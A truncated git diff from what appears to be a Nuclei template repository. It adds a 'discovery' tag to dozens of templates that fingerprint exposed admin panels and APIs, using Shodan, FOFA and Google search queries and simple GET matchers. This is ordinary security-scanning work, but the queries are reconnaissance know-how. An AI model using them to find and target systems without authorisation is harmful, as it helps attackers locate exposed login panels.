-15,7 +15,7 @@ info: shodan-query: title:"xnat" product: xnat vendor: xnat - tags: xnat,panel + tags: xnat,panel,discovery http: - method: GET diff --git a/http/exposed-panels/xoops/xoops-installation-wizard.yaml b/http/exposed-panels/xoops/xoops-installation-wizard.yaml index 153c2609773..dc45c7f6f16 100644 --- a/http/exposed-panels/xoops/xoops-installation-wizard.yaml +++ b/http/exposed-panels/xoops/xoops-installation-wizard.yaml @@ -11,7 +11,7 @@ info: max-request: 1 vendor: xoops product: xoops - tags: panel,xoops + tags: panel,xoops,discovery http: - method: GET diff --git a/http/exposed-panels/xphoneconnect-admin-panel.yaml b/http/exposed-panels/xphoneconnect-admin-panel.yaml index 5e95f41b40d..d43dd4b4dc3 100644 --- a/http/exposed-panels/xphoneconnect-admin-panel.yaml +++ b/http/exposed-panels/xphoneconnect-admin-panel.yaml @@ -18,7 +18,7 @@ info: vendor: c4b product: xphone fofa-query: icon_hash="516202656" - tags: panel,xphone,login,detect + tags: panel,xphone,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/xvr-login.yaml b/http/exposed-panels/xvr-login.yaml index 9a6cf05c6c6..afafdf4f66c 100644 --- a/http/exposed-panels/xvr-login.yaml +++ b/http/exposed-panels/xvr-login.yaml @@ -18,7 +18,7 @@ info: - http.title:"xvr login" fofa-query: title="xvr login" google-query: intitle:"xvr login" - tags: panel,xvr,dahuasecurity + tags: panel,xvr,dahuasecurity,discovery http: - method: GET diff --git a/http/exposed-panels/xweb500-panel.yaml b/http/exposed-panels/xweb500-panel.yaml index 94add23874d..3d2193791a5 100644 --- a/http/exposed-panels/xweb500-panel.yaml +++ b/http/exposed-panels/xweb500-panel.yaml @@ -14,7 +14,7 @@ info: google-query: inurl:"xweb500.cgi" product: dixell_xweb-500_firmware vendor: emerson - tags: panel,xweb500 + tags: panel,xweb500,discovery http: - method: GET diff --git a/http/exposed-panels/xxljob-panel.yaml b/http/exposed-panels/xxljob-panel.yaml index aafddaf147f..6232fc14e8c 100644 --- a/http/exposed-panels/xxljob-panel.yaml +++ b/http/exposed-panels/xxljob-panel.yaml @@ -16,7 +16,7 @@ info: product: xxl-job shodan-query: http.favicon.hash:1691956220 fofa-query: icon_hash=1691956220 - tags: panel,xxljob,login,xuxueli + tags: panel,xxljob,login,xuxueli,discovery http: - method: GET diff --git a/http/exposed-panels/yacht-panel.yaml b/http/exposed-panels/yacht-panel.yaml index 7a6cadf089a..21edd05e187 100644 --- a/http/exposed-panels/yacht-panel.yaml +++ b/http/exposed-panels/yacht-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 zoomeye-query: app="Yacht" - tags: panel,yacht,login,detect + tags: panel,yacht,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/yarn-manager-exposure.yaml b/http/exposed-panels/yarn-manager-exposure.yaml index 07838ce7a48..6211c1252d1 100644 --- a/http/exposed-panels/yarn-manager-exposure.yaml +++ b/http/exposed-panels/yarn-manager-exposure.yaml @@ -11,7 +11,7 @@ info: max-request: 1 vendor: apache product: hadoop - tags: panel,apache,yarn,exposure + tags: panel,apache,yarn,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/yellowfin-panel.yaml b/http/exposed-panels/yellowfin-panel.yaml index 07ef9dd8249..16ce9967a36 100644 --- a/http/exposed-panels/yellowfin-panel.yaml +++ b/http/exposed-panels/yellowfin-panel.yaml @@ -12,7 +12,7 @@ info: vendor: yellowfinbi product: yellowfin shodan-query: title:"Yellowfin Information Collaboration" - tags: yellowfin,panel,login + tags: yellowfin,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/yopass-panel.yaml b/http/exposed-panels/yopass-panel.yaml index a00009e9357..ab01c770311 100644 --- a/http/exposed-panels/yopass-panel.yaml +++ b/http/exposed-panels/yopass-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: title:"Yopass" - tags: panel,yopass + tags: panel,yopass,discovery http: - method: GET diff --git a/http/exposed-panels/ysoft/safeq-panel.yaml b/http/exposed-panels/ysoft/safeq-panel.yaml index d33347fe6db..0ea36ec271b 100644 --- a/http/exposed-panels/ysoft/safeq-panel.yaml +++ b/http/exposed-panels/ysoft/safeq-panel.yaml @@ -20,7 +20,7 @@ info: - title="SafeQ®" - icon_hash="-608698287" - icon_hash="93381563" - tags: panel,ysoft,login,safeq,detect + tags: panel,ysoft,login,safeq,detect,discovery http: - method: GET diff --git a/http/exposed-panels/yunohost-admin-panel.yaml b/http/exposed-panels/yunohost-admin-panel.yaml index 7a98c315354..3587229b9bf 100644 --- a/http/exposed-panels/yunohost-admin-panel.yaml +++ b/http/exposed-panels/yunohost-admin-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: title="YunoHost Admin" - tags: panel,login,yunohost,detect + tags: panel,login,yunohost,detect,discovery http: - method: GET diff --git a/http/exposed-panels/yzmcms-panel.yaml b/http/exposed-panels/yzmcms-panel.yaml index 7d6c95cf180..4af8f59bfdf 100644 --- a/http/exposed-panels/yzmcms-panel.yaml +++ b/http/exposed-panels/yzmcms-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"yzmcms" fofa-query: title="yzmcms" google-query: intitle:"yzmcms" - tags: panel,yzmcms,login + tags: panel,yzmcms,login,discovery http: - method: GET diff --git a/http/exposed-panels/zabbix-server-login.yaml b/http/exposed-panels/zabbix-server-login.yaml index 08c4c10101b..a5036da3322 100644 --- a/http/exposed-panels/zabbix-server-login.yaml +++ b/http/exposed-panels/zabbix-server-login.yaml @@ -22,7 +22,7 @@ info: - app="zabbix-监控系统" && body="saml" - title="zabbix-server" google-query: intitle:"zabbix-server" - tags: panel,zabbix + tags: panel,zabbix,discovery http: - method: GET diff --git a/http/exposed-panels/zammad-helpdesk-panel.yaml b/http/exposed-panels/zammad-helpdesk-panel.yaml index 63c80ecf48b..fccb3e44a32 100644 --- a/http/exposed-panels/zammad-helpdesk-panel.yaml +++ b/http/exposed-panels/zammad-helpdesk-panel.yaml @@ -1,32 +1,32 @@ -id: zammad-helpdesk-panel - -info: - name: Zammad Helpdesk Panel - Detect - author: righettod - severity: info - description: | - Zammad is an open source helpdesk and customer support system that provides ticket management, live chat, and knowledge base functionality. This template detects exposed Zammad installations. - reference: - - https://github.com/zammad/zammad - - https://zammad.org/ - metadata: - verified: true - max-request: 1 - vendor: zammad - product: zammad - shodan-query: http.title:"Zammad Helpdesk" - fofa-query: title="Zammad Helpdesk" - tags: panel,zammad,detect,helpdesk,ticketing - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "zammad helpdesk", "zammad_form_script")' +id: zammad-helpdesk-panel + +info: + name: Zammad Helpdesk Panel - Detect + author: righettod + severity: info + description: | + Zammad is an open source helpdesk and customer support system that provides ticket management, live chat, and knowledge base functionality. This template detects exposed Zammad installations. + reference: + - https://github.com/zammad/zammad + - https://zammad.org/ + metadata: + verified: true + max-request: 1 + vendor: zammad + product: zammad + shodan-query: http.title:"Zammad Helpdesk" + fofa-query: title="Zammad Helpdesk" + tags: panel,zammad,detect,helpdesk,ticketing,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "zammad helpdesk", "zammad_form_script")' condition: and # digest: 4a0a004730450220336da7f9d6dc95300297b4d9b35f287673ac6d24abb6230b0f400e857c3bfd6c022100d878d4629c1a9670ddb1b244a6d6fbb53d2c29530b23796d309959ec389302c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/zblog-exposed-admin-panel.yaml b/http/exposed-panels/zblog-exposed-admin-panel.yaml index 82ca4f8b079..40d5ea53d46 100644 --- a/http/exposed-panels/zblog-exposed-admin-panel.yaml +++ b/http/exposed-panels/zblog-exposed-admin-panel.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.title:zblog fofa-query: title=zblog google-query: intitle:zblog - tags: zblog,panel,zblogcn + tags: zblog,panel,zblogcn,discovery http: - method: GET diff --git a/http/exposed-panels/zblogphp-panel.yaml b/http/exposed-panels/zblogphp-panel.yaml index 9c5be00fb81..a224422ad5b 100644 --- a/http/exposed-panels/zblogphp-panel.yaml +++ b/http/exposed-panels/zblogphp-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.html:"Z-BlogPHP" product: zblogphp vendor: zblogcn - tags: panel,zblogphp + tags: panel,zblogphp,discovery http: - method: GET diff --git a/http/exposed-panels/zenario-login-panel.yaml b/http/exposed-panels/zenario-login-panel.yaml index e78db6699e6..777de37e0a3 100644 --- a/http/exposed-panels/zenario-login-panel.yaml +++ b/http/exposed-panels/zenario-login-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: tribalsystems product: zenario - tags: panel,zenario,tribalsystems + tags: panel,zenario,tribalsystems,discovery http: - method: GET diff --git a/http/exposed-panels/zenml-dashboard-panel.yaml b/http/exposed-panels/zenml-dashboard-panel.yaml index b94cb73c8b4..4a6e574fe1d 100644 --- a/http/exposed-panels/zenml-dashboard-panel.yaml +++ b/http/exposed-panels/zenml-dashboard-panel.yaml @@ -13,7 +13,7 @@ info: product: zenml shodan-query: http.favicon.hash:-2028554187 fofa-query: body="ZenML" - tags: zenml,panel,login + tags: zenml,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/zentao-detect.yaml b/http/exposed-panels/zentao-detect.yaml index 2e4b30cc8e8..72826e440c2 100644 --- a/http/exposed-panels/zentao-detect.yaml +++ b/http/exposed-panels/zentao-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: easycorp product: zentao - tags: panel,easycorp + tags: panel,easycorp,discovery http: - method: GET diff --git a/http/exposed-panels/zentral-panel.yaml b/http/exposed-panels/zentral-panel.yaml index 5b8e407bebf..93702e89fc9 100644 --- a/http/exposed-panels/zentral-panel.yaml +++ b/http/exposed-panels/zentral-panel.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,zentral,oss + tags: panel,zentral,oss,discovery http: - method: GET diff --git a/http/exposed-panels/zeroshell-login.yaml b/http/exposed-panels/zeroshell-login.yaml index 2d49dd04eb1..991ec7111b1 100644 --- a/http/exposed-panels/zeroshell-login.yaml +++ b/http/exposed-panels/zeroshell-login.yaml @@ -18,7 +18,7 @@ info: - http.title:"zeroshell" fofa-query: title="zeroshell" google-query: intitle:"zeroshell" - tags: panel,zeroshell + tags: panel,zeroshell,discovery http: - method: GET diff --git a/http/exposed-panels/zimbra-web-client.yaml b/http/exposed-panels/zimbra-web-client.yaml index ae8c2a1e827..6b7ef868257 100644 --- a/http/exposed-panels/zimbra-web-client.yaml +++ b/http/exposed-panels/zimbra-web-client.yaml @@ -27,7 +27,7 @@ info: google-query: - intitle:"zimbra collaboration suite" - intitle:"zimbra web client sign in" - tags: edb,panel,zimbra,synacor + tags: edb,panel,zimbra,synacor,discovery http: - method: GET diff --git a/http/exposed-panels/zimbra-web-login.yaml b/http/exposed-panels/zimbra-web-login.yaml index 18a29aa410f..f87d9ba3aed 100644 --- a/http/exposed-panels/zimbra-web-login.yaml +++ b/http/exposed-panels/zimbra-web-login.yaml @@ -27,7 +27,7 @@ info: google-query: - intitle:"zimbra collaboration suite" - intitle:"zimbra web client sign in" - tags: panel,zimbra,synacor + tags: panel,zimbra,synacor,discovery http: - method: GET diff --git a/http/exposed-panels/zipkin-exposure.yaml b/http/exposed-panels/zipkin-exposure.yaml index 262bab2ed2c..1798c80ecf8 100644 --- a/http/exposed-panels/zipkin-exposure.yaml +++ b/http/exposed-panels/zipkin-exposure.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: html:"webpackJsonpzipkin-lens" - tags: panel,zipkin + tags: panel,zipkin,discovery http: - method: GET diff --git a/http/exposed-panels/zipline-panel.yaml b/http/exposed-panels/zipline-panel.yaml index 4394f8819ce..33a8bb2d30d 100644 --- a/http/exposed-panels/zipline-panel.yaml +++ b/http/exposed-panels/zipline-panel.yaml @@ -14,7 +14,7 @@ info: vendor: diced product: zipline shodan-query: html:"Zipline" - tags: diced,zipline,login,panel,detect + tags: diced,zipline,login,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-adaudit.yaml b/http/exposed-panels/zoho/manageengine-adaudit.yaml index 68ed51fd715..d5f58ccebc9 100644 --- a/http/exposed-panels/zoho/manageengine-adaudit.yaml +++ b/http/exposed-panels/zoho/manageengine-adaudit.yaml @@ -23,7 +23,7 @@ info: - http.title:"adaudit plus" || http.title:"manageengine - admanager plus" fofa-query: title="adaudit plus" || http.title:"manageengine - admanager plus" google-query: intitle:"adaudit plus" || http.title:"manageengine - admanager plus" - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-adselfservice.yaml b/http/exposed-panels/zoho/manageengine-adselfservice.yaml index aae18b9daf8..d02a56d59a8 100644 --- a/http/exposed-panels/zoho/manageengine-adselfservice.yaml +++ b/http/exposed-panels/zoho/manageengine-adselfservice.yaml @@ -24,7 +24,7 @@ info: google-query: - intitle:"adselfservice plus" - intitle:"manageengine" - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-analytics.yaml b/http/exposed-panels/zoho/manageengine-analytics.yaml index 2cbefec20c6..a1a3e668a8b 100644 --- a/http/exposed-panels/zoho/manageengine-analytics.yaml +++ b/http/exposed-panels/zoho/manageengine-analytics.yaml @@ -19,7 +19,7 @@ info: - title="apex it help desk" shodan-query: http.title:"apex it help desk" google-query: intitle:"apex it help desk" - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml b/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml index 5fcbe524092..befc58d5fc6 100644 --- a/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml +++ b/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml @@ -20,7 +20,7 @@ info: - app="zoho-流量管理" - title="apex it help desk" google-query: intitle:"apex it help desk" - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-applications-manager.yaml b/http/exposed-panels/zoho/manageengine-applications-manager.yaml index de6c1d33d52..cdcbd71d949 100644 --- a/http/exposed-panels/zoho/manageengine-applications-manager.yaml +++ b/http/exposed-panels/zoho/manageengine-applications-manager.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: zohocorp product: manageengine_applications_manager - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-assetexplorer.yaml b/http/exposed-panels/zoho/manageengine-assetexplorer.yaml index 313a250a3cd..3b924077059 100644 --- a/http/exposed-panels/zoho/manageengine-assetexplorer.yaml +++ b/http/exposed-panels/zoho/manageengine-assetexplorer.yaml @@ -18,7 +18,7 @@ info: - http.title:"manageengine assetexplorer" fofa-query: title="manageengine assetexplorer" google-query: intitle:"manageengine assetexplorer" - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-desktop.yaml b/http/exposed-panels/zoho/manageengine-desktop.yaml index 47e4e202d58..29c1e924468 100644 --- a/http/exposed-panels/zoho/manageengine-desktop.yaml +++ b/http/exposed-panels/zoho/manageengine-desktop.yaml @@ -20,7 +20,7 @@ info: - title="manageengine desktop central 10" - app="zoho-manageengine-desktop" google-query: intitle:"manageengine desktop central 10" - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-exchangereporter.yaml b/http/exposed-panels/zoho/manageengine-exchangereporter.yaml index 99a0974c6d5..81c80c367ad 100644 --- a/http/exposed-panels/zoho/manageengine-exchangereporter.yaml +++ b/http/exposed-panels/zoho/manageengine-exchangereporter.yaml @@ -21,7 +21,7 @@ info: fofa-query: - title="ManageEngine - Exchange Reporter Plus" - icon_hash="230963457" - tags: panel,zoho,manageengine,zohocorp,login + tags: panel,zoho,manageengine,zohocorp,login,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-keymanagerplus.yaml b/http/exposed-panels/zoho/manageengine-keymanagerplus.yaml index d1ea44d0d9a..09beb10b35e 100644 --- a/http/exposed-panels/zoho/manageengine-keymanagerplus.yaml +++ b/http/exposed-panels/zoho/manageengine-keymanagerplus.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: panel,zoho,manageengine + tags: panel,zoho,manageengine,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-network-config.yaml b/http/exposed-panels/zoho/manageengine-network-config.yaml index bb1a5a7cb83..e084a9dc5bd 100644 --- a/http/exposed-panels/zoho/manageengine-network-config.yaml +++ b/http/exposed-panels/zoho/manageengine-network-config.yaml @@ -19,7 +19,7 @@ info: - http.title:"network configuration manager" fofa-query: title="network configuration manager" google-query: intitle:"network configuration manager" - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-opmanager.yaml b/http/exposed-panels/zoho/manageengine-opmanager.yaml index c65551369a5..1a005da8efd 100644 --- a/http/exposed-panels/zoho/manageengine-opmanager.yaml +++ b/http/exposed-panels/zoho/manageengine-opmanager.yaml @@ -20,7 +20,7 @@ info: - http.title:"opmanager plus" fofa-query: title="opmanager plus" google-query: intitle:"opmanager plus" - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-servicedesk.yaml b/http/exposed-panels/zoho/manageengine-servicedesk.yaml index 8fd1d88850e..238e2116da8 100644 --- a/http/exposed-panels/zoho/manageengine-servicedesk.yaml +++ b/http/exposed-panels/zoho/manageengine-servicedesk.yaml @@ -18,7 +18,7 @@ info: - http.title:"manageengine servicedesk plus" fofa-query: title="manageengine servicedesk plus" google-query: intitle:"manageengine servicedesk plus" - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoho/manageengine-supportcenter.yaml b/http/exposed-panels/zoho/manageengine-supportcenter.yaml index 80cf110c0e7..ffc41cc3849 100644 --- a/http/exposed-panels/zoho/manageengine-supportcenter.yaml +++ b/http/exposed-panels/zoho/manageengine-supportcenter.yaml @@ -18,7 +18,7 @@ info: - http.title:"manageengine supportcenter plus" fofa-query: title="manageengine supportcenter plus" google-query: intitle:"manageengine supportcenter plus" - tags: panel,zoho,manageengine,zohocorp + tags: panel,zoho,manageengine,zohocorp,discovery http: - method: GET diff --git a/http/exposed-panels/zoneminder-login.yaml b/http/exposed-panels/zoneminder-login.yaml index b160770a45e..19f1d51b62f 100644 --- a/http/exposed-panels/zoneminder-login.yaml +++ b/http/exposed-panels/zoneminder-login.yaml @@ -15,7 +15,7 @@ info: product: zoneminder shodan-query: http.html:"zm - login" fofa-query: body="zm - login" - tags: panel,zoneminder + tags: panel,zoneminder,discovery http: - method: GET diff --git a/http/exposed-panels/zoraxy-panel.yaml b/http/exposed-panels/zoraxy-panel.yaml index 4ae4f9e1888..c36d5c3250d 100644 --- a/http/exposed-panels/zoraxy-panel.yaml +++ b/http/exposed-panels/zoraxy-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Login | Zoraxy" - tags: panel,zoraxy,login + tags: panel,zoraxy,login,discovery http: - method: GET diff --git a/http/exposed-panels/zte-panel.yaml b/http/exposed-panels/zte-panel.yaml index e25ff95a01b..e22413d602b 100644 --- a/http/exposed-panels/zte-panel.yaml +++ b/http/exposed-panels/zte-panel.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.html:"ZTE Corporation" product: nr8120a vendor: zte - tags: panel,zte + tags: panel,zte,discovery http: - method: GET diff --git a/http/exposed-panels/zuul-panel.yaml b/http/exposed-panels/zuul-panel.yaml index f789f7e453d..436e00841f0 100644 --- a/http/exposed-panels/zuul-panel.yaml +++ b/http/exposed-panels/zuul-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.favicon.hash:-1127895693 product: zuul vendor: zuul-ci - tags: panel,zuul,cicd,oss + tags: panel,zuul,cicd,oss,discovery http: - method: GET diff --git a/http/exposed-panels/zyxel-router-panel.yaml b/http/exposed-panels/zyxel-router-panel.yaml index c7144065f78..564a5493126 100644 --- a/http/exposed-panels/zyxel-router-panel.yaml +++ b/http/exposed-panels/zyxel-router-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"web-based configurator" html:"zyxel" fofa-query: title="web-based configurator" html:"zyxel" google-query: intitle:"web-based configurator" html:"zyxel" - tags: panel,zyxel,router,iot + tags: panel,zyxel,router,iot,discovery http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml b/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml index 2fe64106d3f..30e551e9998 100644 --- a/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml +++ b/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.favicon.hash:-440644339 product: zywall_vpn50_firmware vendor: zyxel - tags: panel,xyxel,firewall + tags: panel,xyxel,firewall,discovery http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml index 7cad72fe343..5c0dea57426 100644 --- a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml @@ -15,7 +15,7 @@ info: - http.html:"VMG1312-B10D" - http.html:"vmg1312-b10d" fofa-query: body="vmg1312-b10d" - tags: tech,zyxel,modem,router,panel + tags: tech,zyxel,modem,router,panel,discovery http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml index 66b36209ec3..bffdaa87390 100644 --- a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"VSG1432-B101" - tags: tech,zyxel,modem,router,panel + tags: tech,zyxel,modem,router,panel,discovery http: - method: GET diff --git a/http/exposures/apis/aspnet-soap-webservices-asmx.yaml b/http/exposures/apis/aspnet-soap-webservices-asmx.yaml index 2ae705fcbfb..ba6dd3ed226 100644 --- a/http/exposures/apis/aspnet-soap-webservices-asmx.yaml +++ b/http/exposures/apis/aspnet-soap-webservices-asmx.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:".asmx?WSDL" - tags: config,exposure,asmx,soap + tags: config,exposure,asmx,soap,discovery http: - method: GET diff --git a/http/exposures/apis/asyncapi-inventory.yaml b/http/exposures/apis/asyncapi-inventory.yaml index 22b94521697..67315aad5ac 100644 --- a/http/exposures/apis/asyncapi-inventory.yaml +++ b/http/exposures/apis/asyncapi-inventory.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.asyncapi.com/docs/reference/specification - https://raw.githubusercontent.com/asyncapi/spec/v2.6.0/examples/streetlights-kafka.yml - tags: exposure,asyncapi,api + tags: exposure,asyncapi,api,discovery http: - method: GET diff --git a/http/exposures/apis/couchbase-buckets-api.yaml b/http/exposures/apis/couchbase-buckets-api.yaml index c2355675fad..0d2f9220ef6 100644 --- a/http/exposures/apis/couchbase-buckets-api.yaml +++ b/http/exposures/apis/couchbase-buckets-api.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,couchbase + tags: exposure,couchbase,discovery http: - method: GET diff --git a/http/exposures/apis/drupal-jsonapi-user-listing.yaml b/http/exposures/apis/drupal-jsonapi-user-listing.yaml index ec58ff89fda..102f56c2622 100644 --- a/http/exposures/apis/drupal-jsonapi-user-listing.yaml +++ b/http/exposures/apis/drupal-jsonapi-user-listing.yaml @@ -19,7 +19,7 @@ info: - cpe:"cpe:2.3:a:drupal:drupal" product: drupal vendor: drupal - tags: drupal,exposure + tags: drupal,exposure,discovery http: - method: GET diff --git a/http/exposures/apis/exposed-mcp-server.yaml b/http/exposures/apis/exposed-mcp-server.yaml index e064a178e29..8be3b7be1f9 100644 --- a/http/exposures/apis/exposed-mcp-server.yaml +++ b/http/exposures/apis/exposed-mcp-server.yaml @@ -16,7 +16,7 @@ info: - https://jsonrpc.org/specification - https://github.com/anthropics/anthropic-tools/tree/main/mcp - https://lab.wallarm.com/wallarm-research-nuclei-template-counter-threats-targeting-llm-apps/ - tags: mcp,jsonrpc,devtools,exposure,api,ai,llm + tags: mcp,jsonrpc,devtools,exposure,api,ai,llm,discovery http: - method: POST diff --git a/http/exposures/apis/exposed-mcp-sse-server.yaml b/http/exposures/apis/exposed-mcp-sse-server.yaml index 244ca70d756..a9f6aa9631e 100644 --- a/http/exposures/apis/exposed-mcp-sse-server.yaml +++ b/http/exposures/apis/exposed-mcp-sse-server.yaml @@ -12,7 +12,7 @@ info: verified: true max-requests: 2 shodan-query: "text/event-stream" - tags: mcp,devtools,exposure,api,ai,llm + tags: mcp,devtools,exposure,api,ai,llm,discovery http: - method: GET diff --git a/http/exposures/apis/jeecg-boot-swagger.yaml b/http/exposures/apis/jeecg-boot-swagger.yaml index 9b754eddcaf..172c3a0df6f 100644 --- a/http/exposures/apis/jeecg-boot-swagger.yaml +++ b/http/exposures/apis/jeecg-boot-swagger.yaml @@ -14,7 +14,7 @@ info: product: jeecg-boot shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" - tags: jeecg,swagger,detect,exposure + tags: jeecg,swagger,detect,exposure,discovery http: - method: GET diff --git a/http/exposures/apis/openapi.yaml b/http/exposures/apis/openapi.yaml index ceaaf4e98d7..bdc9d11e1f7 100644 --- a/http/exposures/apis/openapi.yaml +++ b/http/exposures/apis/openapi.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,api + tags: exposure,api,discovery http: - method: GET diff --git a/http/exposures/apis/phoenix-contact-charx-api.yaml b/http/exposures/apis/phoenix-contact-charx-api.yaml index 75974313f93..b473f281945 100644 --- a/http/exposures/apis/phoenix-contact-charx-api.yaml +++ b/http/exposures/apis/phoenix-contact-charx-api.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Phoenix Contact - CHARX" - tags: phoenix-contact,charx,ics,api + tags: phoenix-contact,charx,ics,api,discovery http: - method: GET diff --git a/http/exposures/apis/postman-collection-exposure.yaml b/http/exposures/apis/postman-collection-exposure.yaml index fdc07b2a66a..211debadfb1 100644 --- a/http/exposures/apis/postman-collection-exposure.yaml +++ b/http/exposures/apis/postman-collection-exposure.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"postman.json" - tags: api,postman,exposure + tags: api,postman,exposure,discovery http: - method: GET diff --git a/http/exposures/apis/redfish-api.yaml b/http/exposures/apis/redfish-api.yaml index 70b11575d04..c57184791cc 100644 --- a/http/exposures/apis/redfish-api.yaml +++ b/http/exposures/apis/redfish-api.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"/redfish/v1" - tags: config,exposure,redfish,api + tags: config,exposure,redfish,api,discovery http: - method: GET diff --git a/http/exposures/apis/redoc-api-docs.yaml b/http/exposures/apis/redoc-api-docs.yaml index 250fbc73f3e..df4565d4b8b 100644 --- a/http/exposures/apis/redoc-api-docs.yaml +++ b/http/exposures/apis/redoc-api-docs.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 4 shodan-query: html:"redoc.standalone.js" - tags: api,openapi,redoc,exposure + tags: api,openapi,redoc,exposure,discovery http: - method: GET diff --git a/http/exposures/apis/seafile-api.yaml b/http/exposures/apis/seafile-api.yaml index 86b5cdc10be..33b8977a128 100644 --- a/http/exposures/apis/seafile-api.yaml +++ b/http/exposures/apis/seafile-api.yaml @@ -18,7 +18,7 @@ info: vendor: seafile product: seafile shodan-query: http.html:"seafile" - tags: exposure,api,detect + tags: exposure,api,detect,discovery http: - method: GET diff --git a/http/exposures/apis/strapi-page.yaml b/http/exposures/apis/strapi-page.yaml index 0ea773e1d0d..f6876d1734e 100644 --- a/http/exposures/apis/strapi-page.yaml +++ b/http/exposures/apis/strapi-page.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"Welcome to your Strapi app" product: strapi vendor: strapi - tags: api,strapi,exposure + tags: api,strapi,exposure,discovery http: - method: GET diff --git a/http/exposures/apis/swagger-api.yaml b/http/exposures/apis/swagger-api.yaml index e2cf30cac3e..fca25abf160 100644 --- a/http/exposures/apis/swagger-api.yaml +++ b/http/exposures/apis/swagger-api.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 59 shodan-query: "http.title:\"swagger\"" - tags: exposure,api,swagger + tags: exposure,api,swagger,discovery http: - method: GET diff --git a/http/exposures/apis/tolgee-api.yaml b/http/exposures/apis/tolgee-api.yaml index 3802eb6a6a5..027848a9f52 100644 --- a/http/exposures/apis/tolgee-api.yaml +++ b/http/exposures/apis/tolgee-api.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: html:"tolgee" - tags: 